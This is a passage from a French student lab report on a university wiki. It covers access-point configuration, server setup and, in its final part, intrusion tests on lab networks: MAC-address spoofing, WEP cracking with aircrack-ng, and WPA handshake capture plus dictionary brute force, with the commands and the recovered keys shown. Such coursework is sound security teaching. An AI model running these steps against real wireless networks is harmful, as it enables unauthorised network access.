          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du Wifi sur l'eeePC&amp;lt;/h3&amp;gt;&lt;br /&gt;
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.&lt;br /&gt;
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. &lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Sécurisation Wifi par WPA2-EAP&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès&amp;lt;/h3&amp;gt;&lt;br /&gt;
On commence par remettre le point d’accès en configuration d'usine &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#erase startup-config&lt;br /&gt;
ap#reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#line vty 0 15 &lt;br /&gt;
ap(config-line)#password ****&lt;br /&gt;
&lt;br /&gt;
ap(config)#ip default-gateway 172.20.99.254&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface bvi 1 &lt;br /&gt;
ap(config-if)#ip ad 172.20.99.6 255.255.255.0 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration de la machine virtuel&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
service bind9 stop&lt;br /&gt;
service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 #newaliases&lt;br /&gt;
 #mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@chien:~#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#nano 000-domain.tld-ssl.conf&lt;br /&gt;
    &amp;lt;VirtualHost 193.48.57.181:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.love-in-the-world.space&lt;br /&gt;
        ServerAlias love-in-the-world.space&lt;br /&gt;
        DocumentRoot /var/www/html/&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile /root/chien.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/chien.key&lt;br /&gt;
        SSLCertificateChainFile /root/gandi.crt&lt;br /&gt;
        SSLVerifyClient None&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#a2enmod ssl&lt;br /&gt;
#service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci.  &lt;br /&gt;
&lt;br /&gt;
Changement d'adresse MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On change la cles par: 0000000000&lt;br /&gt;
et le SSID : T1&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key 0000000000&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Préparation aux cassage de clés&amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie consiste a casser une clés WPA par force brute.&lt;br /&gt;
Je m'interesse plus particulierement a caracotte06 comme précédament.&lt;br /&gt;
 &lt;br /&gt;
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake.   &lt;br /&gt;
&lt;br /&gt;
Recuperation du Handshake: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
creation d'un dictionaire :&lt;br /&gt;
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.&lt;br /&gt;
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w Dico wpacracotte06-02.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
après quelle que heures j'obtiens la clès:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [02:00:57] 12399908 keys tested (1782.72 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399906 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B &lt;br /&gt;
                       75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E &lt;br /&gt;
                       94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E &lt;br /&gt;
                       F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E &lt;br /&gt;
                       22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23159</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23159"/>
				<updated>2015-11-23T16:31:06Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Ce mini projet a pour but de nous donner des notion en sécurité informatique.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
